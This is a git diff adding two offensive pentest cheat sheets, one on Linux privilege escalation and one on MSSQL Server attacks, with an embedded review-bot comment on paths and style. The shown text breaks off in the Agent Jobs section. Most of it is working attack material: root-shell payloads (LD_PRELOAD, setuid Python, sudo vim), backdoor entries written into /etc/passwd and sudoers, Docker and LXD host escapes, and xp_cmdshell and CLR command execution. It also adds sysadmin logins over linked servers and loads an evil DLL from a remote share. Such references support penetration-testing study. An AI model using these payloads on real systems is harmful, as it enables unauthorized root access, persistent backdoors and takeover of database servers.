+ +```powershell +cap_dac_read_search # read anything +cap_setuid+ep # setuid +``` + +Example of privilege escalation with `cap_setuid+ep` + +```powershell +$ sudo /usr/bin/setcap cap_setuid+ep /usr/bin/python2.7 + +$ python2.7 -c 'import os; os.setuid(0); os.system("/bin/sh")' +sh-5.0# id +uid=0(root) gid=1000(swissky) +``` + +| Capabilities name | Description | +|---|---| +| CAP_AUDIT_CONTROL | Allow to enable/disable kernel auditing | +| CAP_AUDIT_WRITE | Helps to write records to kernel auditing log | +| CAP_BLOCK_SUSPEND | This feature can block system suspends | +| CAP_CHOWN | Allow user to make arbitrary change to files UIDs and GIDs | +| CAP_DAC_OVERRIDE | This helps to bypass file read, write and execute permission checks | +| CAP_DAC_READ_SEARCH | This only bypasses file and directory read/execute permission checks | +| CAP_FOWNER | This enables bypass of permission checks on operations that normally require the filesystem UID of the process to match the UID of the file | +| CAP_KILL | Allow the sending of signals to processes belonging to others | +| CAP_SETGID | Allow changing of the GID | +| CAP_SETUID | Allow changing of the UID | +| CAP_SETPCAP | Helps to transferring and removal of current set to any PID | +| CAP_IPC_LOCK | This helps to lock memory | +| CAP_MAC_ADMIN | Allow MAC configuration or state changes | +| CAP_NET_RAW | Use RAW and PACKET sockets | +| CAP_NET_BIND_SERVICE | SERVICE Bind a socket to internet domain privileged ports | + +## SUDO + +Tool: [Sudo Exploitation](https://github.com/TH3xACE/SUDO_KILLER) + +### NOPASSWD + +Sudo configuration might allow a user to execute some command with another user's privileges without knowing the password. + +```bash +$ sudo -l + +User demo may run the following commands on crashlab: + (root) NOPASSWD: /usr/bin/vim +``` + +In this example the user `demo` can run `vim` as `root`, it is now trivial to get a shell by adding an ssh key into the root directory or by calling `sh`. 
+ +```bash +sudo vim -c '!sh' +sudo -u root vim -c '!sh' +``` + +### LD_PRELOAD and NOPASSWD + +If `LD_PRELOAD` is explicitly defined in the sudoers file + +```powershell +Defaults env_keep += LD_PRELOAD +``` + +Compile the following shared object using the C code below with `gcc -fPIC -shared -o shell.so shell.c -nostartfiles` + +```c +#include +#include +#include +#include +void _init() { + unsetenv("LD_PRELOAD"); + setgid(0); + setuid(0); + system("/bin/sh"); +} +``` + +Execute any binary with the LD_PRELOAD to spawn a shell : `sudo LD_PRELOAD= `, e.g: `sudo LD_PRELOAD=/tmp/shell.so find` + +### Doas + +There are some alternatives to the `sudo` binary such as `doas` for OpenBSD, remember to check its configuration at `/etc/doas.conf` + +```bash +permit nopass demo as root cmd vim +``` + +### sudo_inject + +Using [https://github.com/nongiach/sudo_inject](https://github.com/nongiach/sudo_inject) + +```powershell +$ sudo whatever +[sudo] password for user: +# Press +c since you don't have the password. +# This creates an invalid sudo tokens. +$ sh exploit.sh +.... wait 1 seconds +$ sudo -i # no password required :) +# id +uid=0(root) gid=0(root) groups=0(root) +``` + +Slides of the presentation : [https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf](https://github.com/nongiach/sudo_inject/blob/master/slides_breizh_2019.pdf) + + +### CVE-2019-14287 + +```powershell +# Exploitable when a user have the following permissions (sudo -l) +(ALL, !root) ALL + +# If you have a full TTY, you can exploit it like this +sudo -u#-1 /bin/bash +sudo -u#4294967295 id +``` + +## GTFOBins + +[GTFOBins](https://gtfobins.github.io) is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. 
+ +The project collects legitimate functions of Unix binaries that can be abused to break out restricted shells, escalate or maintain elevated privileges, transfer files, spawn bind and reverse shells, and facilitate the other post-exploitation tasks. + +> gdb -nx -ex '!sh' -ex quit +> sudo mysql -e '\! /bin/sh' +> strace -o /dev/null /bin/sh +> sudo awk 'BEGIN {system("/bin/sh")}' + + +## Wildcard + +By using tar with –checkpoint-action options, a specified action can be used after a checkpoint. This action could be a malicious shell script that could be used for executing arbitrary commands under the user who starts tar. “Tricking” root to use the specific options is quite easy, and that's where the wildcard comes in handy. + +```powershell +# create file for exploitation +touch -- "--checkpoint=1" +touch -- "--checkpoint-action=exec=sh shell.sh" +echo "#\!/bin/bash\ncat /etc/passwd > /tmp/flag\nchmod 777 /tmp/flag" > shell.sh + +# vulnerable script +tar cf archive.tar * +``` + +Tool: [wildpwn](https://github.com/localh0t/wildpwn) + +## Writable files + +List world writable files on the system. + +```powershell +find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null +find / -perm -2 -type f 2>/dev/null +find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null +``` + +### Writable /etc/sysconfig/network-scripts/ (Centos/Redhat) + +/etc/sysconfig/network-scripts/ifcfg-1337 for example + +```powershell +NAME=Network /bin/id <= Note the blank space +ONBOOT=yes +DEVICE=eth0 + +EXEC : +./etc/sysconfig/network-scripts/ifcfg-1337 +``` +src : [https://vulmon.com/exploitdetailsqidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f](https://vulmon.com/exploitdetails?qidtp=maillist_fulldisclosure&qid=e026a0c5f83df4fd532442e1324ffa4f) + +### Writable /etc/passwd + +First generate a password with one of the following commands. 
+ +```powershell +openssl passwd -1 -salt hacker hacker +mkpasswd -m SHA-512 hacker +python2 -c 'import crypt; print crypt.crypt("hacker", "$6$salt")' +``` + +Then add the user `hacker` and add the generated password. + +```powershell +hacker:GENERATED_PASSWORD_HERE:0:0:Hacker:/root:/bin/bash +``` + +E.g: `hacker:$1$hacker$TzyKlv0/R/c28R.GAeLw.1:0:0:Hacker:/root:/bin/bash` + +You can now use the `su` command with `hacker:hacker` + +Alternatively you can use the following lines to add a dummy user without a password. +WARNING: you might degrade the current security of the machine. + +```powershell +echo 'dummy::0:0::/root:/bin/bash' >>/etc/passwd +su - dummy +``` + +NOTE: In BSD platforms `/etc/passwd` is located at `/etc/pwd.db` and `/etc/master.passwd`, also the `/etc/shadow` is renamed to `/etc/spwd.db`. + +### Writable /etc/sudoers + +```powershell +echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers + +# use SUDO without password +echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers +echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers +``` + +## NFS Root Squashing + +When **no_root_squash** appears in `/etc/exports`, the folder is shareable and a remote user can mount it. + +```powershell +# remote check the name of the folder +showmount -e 10.10.10.10 + +# create dir +mkdir /tmp/nfsdir + +# mount directory +mount -t nfs 10.10.10.10:/shared /tmp/nfsdir +cd /tmp/nfsdir + +# copy wanted shell +cp /bin/bash . + +# set suid permission +chmod +s bash +``` + +## Shared Library + +### ldconfig + +Identify shared libraries with `ldd` + +```powershell +$ ldd /opt/binary + linux-vdso.so.1 (0x00007ffe961cd000) + vulnlib.so.8 => /usr/lib/vulnlib.so.8 (0x00007fa55e55a000) + /lib64/ld-linux-x86-64.so.2 => /usr/lib64/ld-linux-x86-64.so.2 (0x00007fa55e6c8000) +``` + +Create a library in `/tmp` and activate the path. 
+ +```powershell +gcc –Wall –fPIC –shared –o vulnlib.so /tmp/vulnlib.c +echo "/tmp/" > /etc/ld.so.conf.d/exploit.conf && ldconfig -l /tmp/vulnlib.so +/opt/binary +``` + +### RPATH + +```powershell +level15@nebula:/home/flag15$ readelf -d flag15 | egrep "NEEDED|RPATH" + 0x00000001 (NEEDED) Shared library: [libc.so.6] + 0x0000000f (RPATH) Library rpath: [/var/tmp/flag15] + +level15@nebula:/home/flag15$ ldd ./flag15 + linux-gate.so.1 => (0x0068c000) + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0x00110000) + /lib/ld-linux.so.2 (0x005bb000) +``` + +By copying the lib into `/var/tmp/flag15/` it will be used by the program in this place as specified in the `RPATH` variable. + +```powershell +level15@nebula:/home/flag15$ cp /lib/i386-linux-gnu/libc.so.6 /var/tmp/flag15/ + +level15@nebula:/home/flag15$ ldd ./flag15 + linux-gate.so.1 => (0x005b0000) + libc.so.6 => /var/tmp/flag15/libc.so.6 (0x00110000) + /lib/ld-linux.so.2 (0x00737000) +``` + +Then create an evil library in `/var/tmp` with `gcc -fPIC -shared -static-libgcc -Wl,--version-script=version,-Bstatic exploit.c -o libc.so.6` + +```powershell +#include +#define SHELL "/bin/sh" + +int __libc_start_main(int (*main) (int, char **, char **), int argc, char ** ubp_av, void (*init) (void), void (*fini) (void), void (*rtld_fini) (void), void (* stack_end)) +{ + char *file = SHELL; + char *argv[] = {SHELL,0}; + setresuid(geteuid(),geteuid(), geteuid()); + execve(file,argv,0); +} +``` + +## Groups + +### Docker + +Mount the filesystem in a bash container, allowing you to edit the `/etc/passwd` as root, then add a backdoor account `toor:password`. + +```bash +$> docker run -it --rm -v $PWD:/mnt bash +$> echo 'toor:$1$.ZcF5ts0$i4k6rQYzeegUkacRCvfxC0:0:0:root:/root:/bin/sh' >> /mnt/etc/passwd +``` + +Almost similar but you will also see all processes running on the host and be connected to the same NICs. 
+ +```powershell +docker run --rm -it --pid=host --net=host --privileged -v /:/host ubuntu bash +``` + +Or use the following docker image from [chrisfosterelli](https://hub.docker.com/r/chrisfosterelli/rootplease/) to spawn a root shell + +```powershell +$ docker run -v /:/hostOS -i -t chrisfosterelli/rootplease +latest: Pulling from chrisfosterelli/rootplease +2de59b831a23: Pull complete +354c3661655e: Pull complete +91930878a2d7: Pull complete +a3ed95caeb02: Pull complete +489b110c54dc: Pull complete +Digest: sha256:07f8453356eb965731dd400e056504084f25705921df25e78b68ce3908ce52c0 +Status: Downloaded newer image for chrisfosterelli/rootplease:latest + +You should now have a root shell on the host OS +Press Ctrl-D to exit the docker instance / shell + +sh-5.0# id +uid=0(root) gid=0(root) groups=0(root) +``` + +More docker privilege escalation using the Docker Socket. + +```powershell +sudo docker -H unix:///google/host/var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash +sudo docker -H unix:///google/host/var/run/docker.sock run -it --privileged --pid=host debian nsenter -t 1 -m -u -n -i sh +``` + +### LXC/LXD + +The privesc requires to run a container with elevated privileges and mount the host filesystem inside. + +```powershell +╭─swissky@lab ~ +╰─$ id +uid=1000(swissky) gid=1000(swissky) groupes=1000(swissky),3(sys),90(network),98(power),110(lxd),991(lp),998(wheel) +``` + +Build an Alpine image and start it using the flag `security.privileged=true`, forcing the container to interact as root with the host filesystem. 
+ +```powershell +# build a simple alpine image +git clone https://github.com/saghul/lxd-alpine-builder +./build-alpine -a i686 + +# import the image +lxc image import ./alpine.tar.gz --alias myimage + +# run the image +lxc init myimage mycontainer -c security.privileged=true + +# mount the /root into the image +lxc config device add mycontainer mydevice disk source=/ path=/mnt/root recursive=true + +# interact with the container +lxc start mycontainer +lxc exec mycontainer /bin/sh +``` + +Alternatively https://github.com/initstring/lxd_root + + +## Hijack TMUX session + +Require a read access to the tmux socket : `/tmp/tmux-1000/default`. + +```powershell +export TMUX=/tmp/tmux-1000/default,1234,0 +tmux ls +``` + + +## Kernel Exploits + +Precompiled exploits can be found inside these repositories, run them at your own risk ! +* [bin-sploits - @offensive-security](https://github.com/offensive-security/exploitdb-bin-sploits/tree/master/bin-sploits) +* [kernel-exploits - @lucyoa](https://github.com/lucyoa/kernel-exploits/) + +The following exploits are known to work well, search for more exploits with `searchsploit -w linux kernel centos`. + +Another way to find a kernel exploit is to get the specific kernel version and linux distro of the machine by doing `uname -a` +Copy the kernel version and distribution, and search for it in google or in https://www.exploit-db.com/. 
+ +### CVE-2022-0847 (DirtyPipe) + +Linux Privilege Escalation - Linux Kernel 5.8 < 5.16.11 + +``` +https://www.exploit-db.com/exploits/50808 +``` + +### CVE-2016-5195 (DirtyCow) + +Linux Privilege Escalation - Linux Kernel <= 3.19.0-73.8 + +```powershell +# make dirtycow stable +echo 0 > /proc/sys/vm/dirty_writeback_centisecs +g++ -Wall -pedantic -O2 -std=c++11 -pthread -o dcow 40847.cpp -lutil +https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs +https://github.com/evait-security/ClickNRoot/blob/master/1/exploit.c +``` + +### CVE-2010-3904 (RDS) + +Linux RDS Exploit - Linux Kernel <= 2.6.36-rc8 + +```powershell +https://www.exploit-db.com/exploits/15285/ +``` + +### CVE-2010-4258 (Full Nelson) + +Linux Kernel 2.6.37 (RedHat / Ubuntu 10.04) + +```powershell +https://www.exploit-db.com/exploits/15704/ +``` + +### CVE-2012-0056 (Mempodipper) + +Linux Kernel 2.6.39 < 3.2.2 (Gentoo / Ubuntu x86/x64) + +```powershell +https://www.exploit-db.com/exploits/18411 +``` + + +## References + +- [SUID vs Capabilities - Dec 7, 2017 - Nick Void aka mn3m](https://mn3m.info/posts/suid-vs-capabilities/) +- [Privilege escalation via Docker - April 22, 2015 - Chris Foster](https://fosterelli.co/privilege-escalation-via-docker.html) +- [An Interesting Privilege Escalation vector (getcap/setcap) - NXNJZ - AUGUST 21, 2018](https://nxnjz.net/2018/08/an-interesting-privilege-escalation-vector-getcap/) +- [Exploiting wildcards on Linux - Berislav Kucan](https://www.helpnetsecurity.com/2014/06/27/exploiting-wildcards-on-linux/) +- [Code Execution With Tar Command - p4pentest](http://p4pentest.in/2016/10/19/code-execution-with-tar-command/) +- [Back To The Future: Unix Wildcards Gone Wild - Leon Juranic](http://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt) +- [HOW TO EXPLOIT WEAK NFS PERMISSIONS THROUGH PRIVILEGE ESCALATION? 
- APRIL 25, 2018](https://www.securitynewspaper.com/2018/04/25/use-weak-nfs-permissions-escalate-linux-privileges/) +- [Privilege Escalation via lxd - @reboare](https://reboare.github.io/lxd/lxd-escape.html) +- [Editing /etc/passwd File for Privilege Escalation - Raj Chandel - MAY 12, 2018](https://www.hackingarticles.in/editing-etc-passwd-file-for-privilege-escalation/) +- [Privilege Escalation by injecting process possessing sudo tokens - @nongiach @chaignc](https://github.com/nongiach/sudo_inject) +* [Linux Password Security with pam_cracklib - Hal Pomeranz, Deer Run Associates](http://www.deer-run.com/~hal/sysadmin/pam_cracklib.html) +* [Local Privilege Escalation Workshop - Slides.pdf - @sagishahar](https://github.com/sagishahar/lpeworkshop/blob/master/Local%20Privilege%20Escalation%20Workshop%20-%20Slides.pdf) +* [SSH Key Predictable PRNG (Authorized_Keys) Process - @weaknetlabs](https://github.com/weaknetlabs/Penetration-Testing-Grimoire/blob/master/Vulnerabilities/SSH/key-exploit.md) +* [The Dirty Pipe Vulnerability](https://dirtypipe.cm4all.com/) diff --git a/docs/pentest/MSSQL Server - Cheatsheet.md b/docs/pentest/MSSQL Server - Cheatsheet.md new file mode 100644 index 0000000..339a736 --- /dev/null +++ b/docs/pentest/MSSQL Server - Cheatsheet.md 
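Review bot: the Docker-socket examples in this hunk hardcode `unix:///google/host/var/run/docker.sock`, a path specific to whatever environment the lines were lifted from; the daemon socket is normally `/var/run/docker.sock`, so either show the standard path or say where the `/google/host/...` variant applies. In the LXD block the comment `# mount the /root into the image` does not describe the command below it, which adds `source=/` (the entire host filesystem) at `/mnt/root`; adjust the comment so readers understand they are exposing the whole host. Style: the References list switches from `-` to `*` bullets partway through, and the DirtyPipe fence is the only exploit block in the file without a language tag.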
@@ -0,0 +1,676 @@ +# MSSQL Server + +## Summary + +* [Tools](#tools) +* [Identify Instances and Databases](#identifiy-instaces-and-databases) + * [Discover Local SQL Server Instances](#discover-local-sql-server-instances) + * [Discover Domain SQL Server Instances](#discover-domain-sql-server-instances) + * [Discover Remote SQL Server Instances](#discover-remote-sql-instances) + * [Identify Encrypted databases](#identifiy-encrypted-databases) + * [Version Query](#version-query) +* [Identify Sensitive Information](#identify-sensitive-information) + * [Get Tables from a Specific Database](#get-tables-from-specific-databases) + * [Gather 5 Entries from Each Column](#gather-5-entries-from-each-column) + * [Gather 5 Entries from a Specific Table](#gather-5-entries-from-a-specific-table) + * [Dump common information from server to files](#dump-common-information-from-server-to-files) +* [Linked Database](#linked-database) + * [Find Trusted Link](#find-trusted-link) + * [Execute Query Through The Link](#execute-query-through-the-link) + * [Crawl Links for Instances in the Domain](#crawl-links-for-instances-in-the-domain) + * [Crawl Links for a Specific Instance](#crawl-links-for-a-specific-instance) + * [Query Version of Linked Database](#query-version-of-linked-database) + * [Execute Procedure on Linked Database](#execute-procedure-on-linked-database) + * [Determine Names of Linked Databases ](#determine-names-of-linked-databases) + * [Determine All the Tables Names from a Selected Linked Database](#determine-all-the-tables-names-from-a-selected-linked-database) + * [Gather the Top 5 Columns from a Selected Linked Table](#gather-the-top-5-columns-from-a-selected-linked-table) + * [Gather Entries from a Selected Linked Column](#gather-entries-from-a-selected-linked-column) +* [Command Execution via xp_cmdshell](#command-execution-via-xp_cmdshell) +* [Extended Stored Procedure](#extended-stored-procedure) + * [Add the extended stored procedure and list extended stored 
procedures](#add-the-extended-stored-procedure-and-list-extended-stored-procedures) +* [CLR Assemblies](#clr-assemblies) + * [Execute commands using CLR assembly](#execute-commands-using-clr-assembly) + * [Manually creating a CLR DLL and importing it](#manually-creating-a-clr-dll-and-importing-it) +* [OLE Automation](#ole-automation) + * [Execute commands using OLE automation procedures](#execute-commands-using-ole-automation-procedures) +* [Agent Jobs](#agent-jobs) + * [Execute commands through SQL Agent Job service](#execute-commands-through-sql-agent-job-service) + * [List All Jobs](#list-all-jobs) +* [External Scripts](#external-scripts) + * [Python](#python) + * [R](#r) +* [Audit Checks](#audit-checks) + * [Find and exploit impersonation opportunities](#find-and-exploit-impersonation-opportunities) +* [Find databases that have been configured as trustworthy](#find-databases-that-have-been-configured-as-trustworthy) +* [Manual SQL Server Queries](#manual-sql-server-queries) + * [Query Current User & determine if the user is a sysadmin](#query-current-user--determine-if-the-user-is-a-sysadmin) + * [Current Role](#current-role) + * [Current DB](#current-db) + * [List all tables](#list-all-tables) + * [List all databases](#list-all-databases) + * [All Logins on Server](#all-logins-on-server) + * [All Database Users for a Database](#all-database-users-for-a-database) + * [List All Sysadmins](#list-all-sysadmins) + * [List All Database Roles](#list-all-database-role) + * [Effective Permissions from the Server](#effective-permissions-from-the-server) + * [Effective Permissions from the Database](#effective-permissions-from-the-database) + * [Find SQL Server Logins Which can be Impersonated for the Current Database](#find-sql-server-logins-which-can-be-impersonated-for-the-current-database) + * [Exploiting Impersonation](#exploiting-impersonation) + * [Exploiting Nested Impersonation](#exploiting-nested-impersonation) + * [MSSQL Accounts and 
Hashes](#mssql-accounts-and-hashes) +* [References](#references) + +## Tools + +* [NetSPI/PowerUpSQL](https://github.com/NetSPI/PowerUpSQL) - A PowerShell Toolkit for Attacking SQL Server +* [skahwah/SQLRecon](https://github.com/skahwah/SQLRecon/) - A C# MS SQL toolkit designed for offensive reconnaissance and post-exploitation. + +## Identify Instances and Databases + +### Discover Local SQL Server Instances + +```ps1 +Get-SQLInstanceLocal +``` + +### Discover Domain SQL Server Instances + +```ps1 +Get-SQLInstanceDomain -Verbose +# Get Server Info for Found Instances +Get-SQLInstanceDomain | Get-SQLServerInfo -Verbose +# Get Database Names +Get-SQLInstanceDomain | Get-SQLDatabase -NoDefaults +``` + +### Discover Remote SQL Server Instances + +```ps1 +Get-SQLInstanceBroadcast -Verbose +Get-SQLInstanceScanUDPThreaded -Verbose -ComputerName SQLServer1 +``` + +### Identify Encrypted databases +Note: These are automatically decrypted for admins + + +```ps1 +Get-SQLDatabase -Username sa -Password Password1234 -Instance "" -Verbose | Where-Object {$_.is_encrypted -eq "True"} +``` + +### Version Query + +```ps1 +Get-SQLInstanceDomain | Get-Query "select @@version" +``` + +## Identify Sensitive Information + +### Get Tables from a Specific Database + +```ps1 +Get-SQLInstanceDomain | Get-SQLTable -DatabaseName -NoDefaults +Get Column Details from a Table +Get-SQLInstanceDomain | Get-SQLColumn -DatabaseName -TableName +``` + + +### Gather 5 Entries from Each Column + + +```ps1 +Get-SQLInstanceDomain | Get-SQLColumnSampleData -Keywords "" -Verbose -SampleSize 5 +``` + +### Gather 5 Entries from a Specific Table + + +```ps1 +Get-SQLQuery -Instance "" -Query 'select TOP 5 * from .dbo.' 
+``` + + +### Dump common information from server to files + +```ps1 +Invoke-SQLDumpInfo -Verbose -Instance SQLSERVER1\Instance1 -csv +``` + +## Linked Database + +### Find Trusted Link + +```sql +select * from master..sysservers +``` + +### Execute Query Through The Link + +```sql +-- execute query through the link +select * from openquery("dcorp-sql1", 'select * from master..sysservers') +select version from openquery("linkedserver", 'select @@version as version'); + +-- chain multiple openquery +select version from openquery("link1",'select version from openquery("link2","select @@version as version")') + +-- execute shell commands +EXECUTE('sp_configure ''xp_cmdshell'',1;reconfigure;') AT LinkedServer +select 1 from openquery("linkedserver",'select 1;exec master..xp_cmdshell "dir c:"') + +-- create user and give admin privileges +EXECUTE('EXECUTE(''CREATE LOGIN hacker WITH PASSWORD = ''''P@ssword123.'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +EXECUTE('EXECUTE(''sp_addsrvrolemember ''''hacker'''' , ''''sysadmin'''' '') AT "DOMINIO\SERVER1"') AT "DOMINIO\SERVER2" +``` + +### Crawl Links for Instances in the Domain +A Valid Link Will Be Identified by the DatabaseLinkName Field in the Results + + +```ps1 +Get-SQLInstanceDomain | Get-SQLServerLink -Verbose +select * from master..sysservers +``` + +### Crawl Links for a Specific Instance + +```ps1 +Get-SQLServerLinkCrawl -Instance "" -Verbose +select * from openquery("",'select * from openquery("",''select * from master..sysservers'')') +``` + +### Query Version of Linked Database + + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select @@version')" -Verbose +``` + +### Execute Procedure on Linked Database + +```ps1 +SQL> EXECUTE('EXEC sp_configure ''show advanced options'',1') at "linked.database.local"; +SQL> EXECUTE('RECONFIGURE') at "linked.database.local"; +SQL> EXECUTE('EXEC sp_configure ''xp_cmdshell'',1;') at "linked.database.local"; +SQL> EXECUTE('RECONFIGURE') at 
"linked.database.local"; +SQL> EXECUTE('exec xp_cmdshell whoami') at "linked.database.local"; +``` + +### Determine Names of Linked Databases + +> tempdb, model ,and msdb are default databases usually not worth looking into. Master is also default but may have something and anything else is custom and definitely worth digging into. The result is DatabaseName which feeds into following query. + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select name from sys.databases')" -Verbose +``` + +### Determine All the Tables Names from a Selected Linked Database + +> The result is TableName which feeds into following query + + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select name from .sys.tables')" -Verbose +``` + +### Gather the Top 5 Columns from a Selected Linked Table + +> The results are ColumnName and ColumnValue which feed into following query + + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`",'select TOP 5 * from .dbo.')" -Verbose +``` + +### Gather Entries from a Selected Linked Column + + +```ps1 +Get-SQLQuery -Instance "" -Query "select * from openquery(`"`"'select * from .dbo. 
where =')" -Verbose +``` + + +## Command Execution via xp_cmdshell + +> xp_cmdshell disabled by default since SQL Server 2005 + +```ps1 +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command whoami + +# Creates and adds local user backup to the local administrators group: +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net user backup Password1234 /add'" -Verbose +PowerUpSQL> Invoke-SQLOSCmd -Username sa -Password Password1234 -Instance "" -Command "net localgroup administrators backup /add" -Verbose +``` + +* Manually execute the SQL query + ```sql + EXEC xp_cmdshell "net user"; + EXEC master..xp_cmdshell 'whoami' + EXEC master.dbo.xp_cmdshell 'cmd.exe dir c:'; + EXEC master.dbo.xp_cmdshell 'ping 127.0.0.1'; + ``` +* If you need to reactivate xp_cmdshell (disabled by default in SQL Server 2005) + ```sql + EXEC sp_configure 'show advanced options',1; + RECONFIGURE; + EXEC sp_configure 'xp_cmdshell',1; + RECONFIGURE; + ``` +* If the procedure was uninstalled + ```sql + sp_addextendedproc 'xp_cmdshell','xplog70.dll' + ``` + + +## Extended Stored Procedure + +### Add the extended stored procedure and list extended stored procedures + +```ps1 +# Create evil DLL +Create-SQLFileXpDll -OutFile C:\temp\test.dll -Command "echo test > c:\temp\test.txt" -ExportName xp_test + +# Load the DLL and call xp_test +Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "sp_addextendedproc 'xp_test', '\\10.10.0.1\temp\test.dll'" +Get-SQLQuery -UserName sa -Password Password1234 -Instance "" -Query "EXEC xp_test" + +# Listing existing +Get-SQLStoredProcedureXP -Instance "" -Verbose +``` + +* Build a DLL using [xp_evil_template.cpp](https://raw.githubusercontent.com/nullbind/Powershellery/master/Stable-ish/MSSQL/xp_evil_template.cpp) +* Load the DLL + ```sql + -- can also be loaded from UNC path or Webdav + sp_addextendedproc 'xp_calc', 'C:\mydll\xp_calc.dll' + EXEC xp_calc + sp_dropextendedproc 
'xp_calc' + ``` + +## CLR Assemblies + +Prerequisites: +* sysadmin privileges +* CREATE ASSEMBLY permission (or) +* ALTER ASSEMBLY permission (or) + +The execution takes place with privileges of the **service account**. + +### Execute commands using CLR assembly + +```ps1 +# Create C# code for the DLL, the DLL and SQL query with DLL as hexadecimal string +Create-SQLFileCLRDll -ProcedureName "runcmd" -OutFile runcmd -OutDir C:\Users\user\Desktop + +# Execute command using CLR assembly +Invoke-SQLOSCmdCLR -Username sa -Password -Instance -Command "whoami" -Verbose +Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose +Invoke-SQLOSCmdCLR -Username sa -Password Password1234 -Instance "" -Command "powershell -e " -Verbose + +# List all the stored procedures added using CLR +Get-SQLStoredProcedureCLR -Instance -Verbose +``` + +### Manually creating a CLR DLL and importing it + +Create a C# DLL file with the following content, with the command : `C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library c:\temp\cmd_exec.cs` + +```csharp +using System; +using System.Data; +using System.Data.SqlClient; +using System.Data.SqlTypes; +using Microsoft.SqlServer.Server; +using System.IO; +using System.Diagnostics; +using System.Text; + +public partial class StoredProcedures +{ + [Microsoft.SqlServer.Server.SqlProcedure] + public static void cmd_exec (SqlString execCommand) + { + Process proc = new Process(); + proc.StartInfo.FileName = @"C:\Windows\System32\cmd.exe"; + proc.StartInfo.Arguments = string.Format(@" /C {0}", execCommand.Value); + proc.StartInfo.UseShellExecute = false; + proc.StartInfo.RedirectStandardOutput = true; + proc.Start(); + + // Create the record and specify the metadata for the columns. + SqlDataRecord record = new SqlDataRecord(new SqlMetaData("output", SqlDbType.NVarChar, 4000)); + + // Mark the beginning of the result set. 
+ SqlContext.Pipe.SendResultsStart(record); + + // Set values for each column in the row + record.SetString(0, proc.StandardOutput.ReadToEnd().ToString()); + + // Send the row back to the client. + SqlContext.Pipe.SendResultsRow(record); + + // Mark the end of the result set. + SqlContext.Pipe.SendResultsEnd(); + + proc.WaitForExit(); + proc.Close(); + } +}; +``` + +Then follow these instructions: + +1. Enable `show advanced options` on the server + ```sql + sp_configure 'show advanced options',1; + RECONFIGURE + GO + ``` +2. Enable CLR on the server + ```sql + sp_configure 'clr enabled',1 + RECONFIGURE + GO + ``` +3. Import the assembly + ```sql + CREATE ASSEMBLY my_assembly + FROM 'c:\temp\cmd_exec.dll' + WITH PERMISSION_SET = UNSAFE; + ``` +4. Link the assembly to a stored procedure + ```sql + CREATE PROCEDURE [dbo].[cmd_exec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [my_assembly].[StoredProcedures].[cmd_exec]; + GO + ``` +5. Execute and clean + ```sql + cmd_exec "whoami" + DROP PROCEDURE cmd_exec + DROP ASSEMBLY my_assembly + ``` + +**CREATE ASSEMBLY** will also accept an hexadecimal string representation of a CLR DLL + +```sql +CREATE ASSEMBLY [my_assembly] AUTHORIZATION [dbo] FROM +0x4D5A90000300000004000000F[TRUNCATED] +WITH PERMISSION_SET = UNSAFE +GO +``` + +## OLE Automation + +* :warning: Disabled by default +* The execution takes place with privileges of the **service account**. 
+ +### Execute commands using OLE automation procedures + +```ps1 +Invoke-SQLOSCmdOle -Username sa -Password Password1234 -Instance "" -Command "whoami" Verbose +``` + +```ps1 +# Enable OLE Automation +EXEC sp_configure 'show advanced options', 1 +EXEC sp_configure reconfigure +EXEC sp_configure 'OLE Automation Procedures', 1 +EXEC sp_configure reconfigure + +# Execute commands +DECLARE @execmd INT +EXEC SP_OACREATE 'wscript.shell', @execmd OUTPUT +EXEC SP_OAMETHOD @execmd, 'run', null, '%systemroot%\system32\cmd.exe /c' +``` + + +```powershell +# https://github.com/blackarrowsec/mssqlproxy/blob/master/mssqlclient.py +python3 mssqlclient.py 'host/username:password@10.10.10.10' -install -clr Microsoft.SqlServer.Proxy.dll +python3 mssqlclient.py 'host/username:password@10.10.10.10' -check -reciclador 'C:\windows\temp\reciclador.dll' +python3 mssqlclient.py 'host/username:password@10.10.10.10' -start -reciclador 'C:\windows\temp\reciclador.dll' +SQL> enable_ole +SQL> upload reciclador.dll C:\windows\temp\reciclador.dll +``` + + +## Agent Jobs + +* The execution takes place with privileges of the **SQL Server Agent service account** if a proxy account is not configured. +* :warning: Require **sysadmin** or **SQLAgentUserRole**, **SQLAgentReaderRole**, and **SQLAgentOperatorRole** roles to create a job. 
